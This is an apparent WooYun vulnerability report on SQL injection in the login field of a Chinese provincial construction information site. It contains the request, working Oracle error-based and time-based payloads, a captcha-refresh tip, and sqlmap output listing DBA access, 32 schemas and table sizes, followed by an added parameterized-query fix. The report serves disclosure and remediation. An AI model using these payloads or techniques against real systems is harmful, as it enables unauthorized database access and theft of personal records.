
Vulnerability summary

Defect ID: wooyun-2016-0171019

Title: SQL injection in the login user name field of a site belonging to a provincial construction information center (DBA privileges / 32 databases / hundreds of thousands of sensitive records exposed)

Vendor: cncert (National Internet Emergency Center, CNCERT)

Author: 路人甲

Submitted: 2016-01-19 19:20

Fixed: 2016-03-05 09:52

Disclosed: 2016-03-05 09:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure timeline:

2016-01-19: Details sent to the vendor; awaiting the vendor's handling
2016-01-22: Vendor has confirmed; details disclosed to the vendor only
2016-02-01: Details disclosed to core white hats and experts in the relevant field
2016-02-11: Details disclosed to regular white hats
2016-02-21: Details disclosed to intern white hats
2016-03-05: Details disclosed to the public

Brief description:

There is an injection in the login name field of a certain site!~~~ (Did you think adding a captcha would stop injection?) Front page, maybe? It has been a long time since I made the front page!~~~

Detailed description:

Injection point:

http://**.**.**.**/app/Login/Login_Xzgl.aspx (POST)
__VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX5BdlLHU955/0%3D&__VIEWSTATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8%2BgOST8pbNhPv7pdJrprxHot9VXnGSvdLvTFB%2BrLgc2QhhilbcAxcI7CH6dtt%2BUwM3FI1M0Ks4N1wc%2Bop4oRunf14dz2Zt2%2BQKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin&txtMm=1111&passwordID=64021&btnLogin=


For passwordID, it is best to refresh the page before the injection test, then manually replace the captcha value in the captured request data with the captcha shown on the page; after that the injection works!~~~

201.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtYhm
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX5BdlLHU955/0=&__VIEWSTATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8+gOST8pbNhPv7pdJrprxHot9VXnGSvdLvTFB+rLgc2QhhilbcAxcI7CH6dtt+UwM3FI1M0Ks4N1wc+op4oRunf14dz2Zt2+QKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin' AND 5174=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(117)||CHR(101)||CHR(113)||(SELECT (CASE WHEN (5174=5174) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(101)||CHR(114)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'VTYN'='VTYN&txtMm=1111&passwordID=64021&btnLogin=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: __VIEWSTATE=/wEPDwUKMTI1MTk2NDQzM2RkZlN2pd5xKYBwXoQHpfu9mim3ff30ERX5BdlLHU955/0=&__VIEWSTATEGENERATOR=36D4F313&__EVENTVALIDATION=/wEdAAUcqP6Xl8+gOST8pbNhPv7pdJrprxHot9VXnGSvdLvTFB+rLgc2QhhilbcAxcI7CH6dtt+UwM3FI1M0Ks4N1wc+op4oRunf14dz2Zt2+QKDEFkPjtDkyZ3FioeQClwmwcgVRVn/f/tqSd2Adebsfwzj&txtYhm=admin' AND 1629=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CHR(76)||CHR(82)||CHR(76),5) AND 'aEhA'='aEhA&txtMm=1111&passwordID=64021&btnLogin=
---
[23:03:34] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Oracle
[23:03:34] [INFO] fetching current user
[23:03:35] [INFO] retrieved: JZSCJGPT
current user: 'JZSCJGPT'
[23:03:35] [INFO] fetching current database
[23:03:35] [INFO] resumed: JZSCJGPT
[23:03:35] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'JZSCJGPT'
[23:03:35] [INFO] testing if current user is DBA
current user is DBA: True
available databases [32]:
[*] CTXSYS
[*] DBSNMP
[*] DLQLXT
[*] EXFSYS
[*] FLOWS_030000
[*] FLOWS_FILES
[*] HBDYDB
[*] HBDYDB_BF
[*] HBDYDB_TEST
[*] HBSBDYKS
[*] HBSJSXXZXZHWHXT
[*] JGPTBZK
[*] JZSCJGPT
[*] JZSCJGPTNEW
[*] JZSCJGPTWF
[*] JZSCJGPTZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SJBDB
[*] SMZ
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WK_TEST
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZLJD
Database: JZSCJGPT
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| RYJBXX | 408607 |
| RYZGXX | 388823 |
| SGTSCXX_SCR | 196962 |
| SGTSCXX_KCSJDW | 79553 |
| RYZCXX | 66610 |
| XMBMK | 45836 |
| SGTSCXX | 37541 |
| RESULT_QYZZ | 28709 |
| QYRYGXB | 22123 |
| TBTENDERINFO | 20162 |
| SGTSCXX_ZCRY | 19455 |
| XMXX | 14228 |
| HZSQJLB | 7698 |
| TBBUILDERLICENCEMANAGE | 7384 |
| ZTBRYB | 6815 |
| XMRYXX | 6756 |
| QYRYGXSHB | 6079 |
| QYZCGL | 3256 |
| TBCONTRACTRECORDMANAGE | 3194 |
| QYSHB | 3094 |
| QYJBXX_RESULT | 2666 |
| SYS_ZD | 1843 |
| SYS_YHGL | 1669 |
| DIC_QYZZLB | 1080 |
| SYS_JSFP | 1018 |
| JGYSBAXX | 986 |
| QYRYGXBBF | 846 |
| SJSGQY | 800 |
| MBCS | 792 |
| SJXMCLQD | 560 |
| XMBJSHYJ | 522 |
| XMBJCL | 409 |
| SGTSCSHYJ | 399 |
| QYJBXX_XXBG | 339 |
| SJJLDW | 320 |
| QYXXBGSHB | 223 |
| SJJSDW | 200 |
| RYCLXX | 186 |
| JSGCZLAQJDCL | 179 |
| TPCORPBADDIC | 175 |
| DXNDRYB | 138 |
| ZTBSHB | 129 |
| SYS_YM | 100 |
| DXNDRYCLB | 97 |
| SGXKDWGCB | 91 |
| HTCLB | 79 |
| XMXX_MD5 | 77 |
| XMXX_MD5_CDC | 77 |
| XMXX_TEST | 77 |
| WSQYJECLB_ND | 70 |
| QYJBXX_BACK | 68 |
| TBPERSONBADDIC | 67 |
| QYZZCLB | 65 |
| SJXMDWQK | 60 |
| WSJETBRY | 56 |
| SYS_JS | 52 |
| ZTBCLB | 45 |
| HTSHB | 43 |
| QYZZCLB_XXBG | 39 |
| DXNDSHB | 37 |
| DZMB | 36 |
| CODEUPDATEJL | 35 |
| DXNDCLB | 35 |
| XMJLSCORESTAND | 33 |
| WSJETBXM | 31 |
| ZLAQJDSHYJ | 30 |
| SGXKSHB | 28 |
| QYZZCLB_BACK | 22 |
| DXNDQYB | 21 |
| DXNDXXB | 21 |
| QYJEXXB | 20 |
| SJXMJBQK | 20 |
| SGXKCLB | 19 |
| DXNDAJB | 18 |
| SGTCLB | 18 |
| JSGCZLAQJD_NEW | 14 |
| TBCORPGOODCREDITINFO | 13 |
| DXNDJEJGB | 9 |
| RYZGXXWS | 9 |
| TPCORPBADDICSTANDARD | 9 |
| WSGLJGLCB | 9 |
| WSQYZZB | 9 |
| QYSSCL | 7 |
| TBPROJECTFINISHMANAGE | 7 |
| WSJETBDJ | 6 |
| WSQYJESHB | 6 |
| BA_ZBDL | 5 |
| TBCORPBADCREDITINFO | 5 |
| WSQYJESHB_ND | 5 |
| TBPERSONBADDICSTANDARD | 4 |
| WSCZB | 4 |
| BA_RY | 3 |
| JGYSSHYJ | 3 |
| CCTV | 2 |
| JGYSCLB | 2 |
| QYSS | 2 |
| SGTSCJG | 2 |
| BAI_TJ | 1 |
| DXNDXMB | 1 |
| HTBAPDFCL | 1 |
| JCDBCW | 1 |
| JCDBDW | 1 |
| JCDBFWB | 1 |
| JCDBLWB | 1 |
| JCDBRY | 1 |
| JCDBSCB | 1 |
| NBCYRYJGZZE | 1 |
| NBJZYQYCWZK | 1 |
| NBJZYQYSCQK | 1 |
| NBQYDZSWJYQK | 1 |
| NBXXHQK | 1 |
| ZHDBCWB | 1 |
| ZHDBFWB | 1 |
| ZHDBLWB | 1 |
| ZHDBSCB | 1 |
+------------------------+---------+
Is the one below about housing prices?
Database: HBDYDB
+---------------+---------+
| Table | Entries |
+---------------+---------+
| SP_FJ | 215287 |
| SYSROLEUSER | 59702 |
| SP_SXGXB | 42454 |
| SP_JSGR | 25724 |
| SP_SCYJB | 24952 |
| SP_HZLZZ | 22120 |
| LZSH_DJ | 14805 |
| SBMXXB | 13014 |
| GLYHZCB | 12384 |
| SP_QYXX | 12229 |
| SP_XCGLRY | 11586 |
| SP_ZJYJRY | 7463 |
| SP_HZSQB | 7220 |
| QYZZ | 5187 |
| SP_QYZZ | 4903 |
| SP_ZCJZS | 4529 |
| QYXXB | 2953 |
| SYSSJZD | 2936 |
| SP_JXSB | 1936 |
| SP_SXZZ | 1861 |
| JSFZRGCYJ | 1766 |
| SP_QYFR | 1545 |
| BA_JZC | 1126 |
| SP_JSFZR | 1099 |
| SP_QYJJ | 983 |
| QYZZ_OLD | 780 |
| SP_HZ | 671 |
| SP_SXXX | 629 |
| MBYSB | 574 |
| BG_SPLC | 474 |
| QYXXB_OLD | 427 |
| BA_KC | 367 |
| SP_GCYJ | 308 |
| SP_BZCL | 254 |
| SP_ZJSXGXB | 213 |
| SYS_ROLE_MENU | 208 |
| BA_JC | 202 |
| SP_GXB | 151 |
| DIC_CAILIAO | 142 |
| SP_ZZBM | 126 |
| BG_XXBG | 122 |
| BA_JZC_BACK | 76 |
| BA_KC_BACK | 74 |
| SYS_MENU | 64 |
| DIC_TABLE | 41 |
| ZJMBB | 36 |
| SYSROLE | 29 |
| BA_JC_BACK | 26 |
| SP_SS | 24 |
| SP_CLB | 23 |
| SP_SXB | 23 |
| BA_ZJ_BACK | 18 |
| BA_ZJ | 17 |
| DIC_SHIXIANG | 13 |
| QYJBXX | 2 |
+---------------+---------+


Screenshots: 202.jpg, 203.jpg, 204.jpg, 205.jpg, 206.jpg, 207.jpg, 208.jpg, 209.jpg, 210.jpg, 211.jpg, 212.jpg


Proof of vulnerability:

As above.

Remediation:

Fix by filtering the input!~~~
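The injection point above (the txtYhm field of Login_Xzgl.aspx, sent to an Oracle back end from an ASP.NET page) and the remediation line are both served by the following added example. It is not code from the affected site or from the report's author: it reconstructs the kind of concatenated login query that makes txtYhm injectable and places it beside the bound-parameter form that closes the hole regardless of what the input contains. The table and column names (SYS_YHGL, YHM, MM), the ODP.NET managed driver, and the already-open connection are assumptions.

```csharp
// Added example (not the affected site's code): concatenated login query next to its
// bound-parameter replacement. Assumptions: Oracle.ManagedDataAccess (ODP.NET managed
// driver), an open OracleConnection supplied by the caller, and hypothetical table and
// column names SYS_YHGL / YHM / MM.
using System;
using Oracle.ManagedDataAccess.Client;

public static class LoginRepository
{
    // VULNERABLE: the user name taken from txtYhm is spliced into the SQL text, so a
    // value such as  admin' AND <expr> AND 'VTYN'='VTYN  (the shape sqlmap used in the
    // report) becomes part of the statement. The captcha carried in passwordID does not
    // help: it gates the request, not the query, and the report shows it being refreshed
    // and resent with each attempt.
    public static bool LoginVulnerable(OracleConnection conn, string userName, string pwdHash)
    {
        string sql = "SELECT COUNT(*) FROM SYS_YHGL WHERE YHM = '" + userName +
                     "' AND MM = '" + pwdHash + "'";
        using (var cmd = new OracleCommand(sql, conn))
        {
            return Convert.ToInt32(cmd.ExecuteScalar()) > 0;
        }
    }

    // HARDENED: bind variables. The statement text is a constant and the two values are
    // sent to Oracle separately, so quotes, AND, XMLType(...) or
    // DBMS_PIPE.RECEIVE_MESSAGE(...) in the input are compared as literal characters
    // and never parsed as SQL.
    public static bool LoginSafe(OracleConnection conn, string userName, string pwdHash)
    {
        const string sql = "SELECT COUNT(*) FROM SYS_YHGL WHERE YHM = :yhm AND MM = :mm";
        using (var cmd = new OracleCommand(sql, conn))
        {
            cmd.BindByName = true;
            cmd.Parameters.Add("yhm", OracleDbType.Varchar2).Value = userName;
            cmd.Parameters.Add("mm", OracleDbType.Varchar2).Value = pwdHash;
            return Convert.ToInt32(cmd.ExecuteScalar()) > 0;
        }
    }
}
```

Two points from the sqlmap output are worth carrying into the fix. First, the error-based payload only works because Oracle's XMLType error text reaches the HTTP response, so custom error pages that hide ORA- messages shrink the attacker's feedback even before the query is fixed. Second, "current user is DBA: True" is why one injectable field exposed all 32 schemas; the application account should own only the JZSCJGPT objects it needs, so that an injection in one page cannot read HBDYDB or SYS.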

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-01-22 10:19

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded by CNCERT to the Hubei branch center, which will coordinate follow-up handling with the website's administering unit.

Latest status:

None yet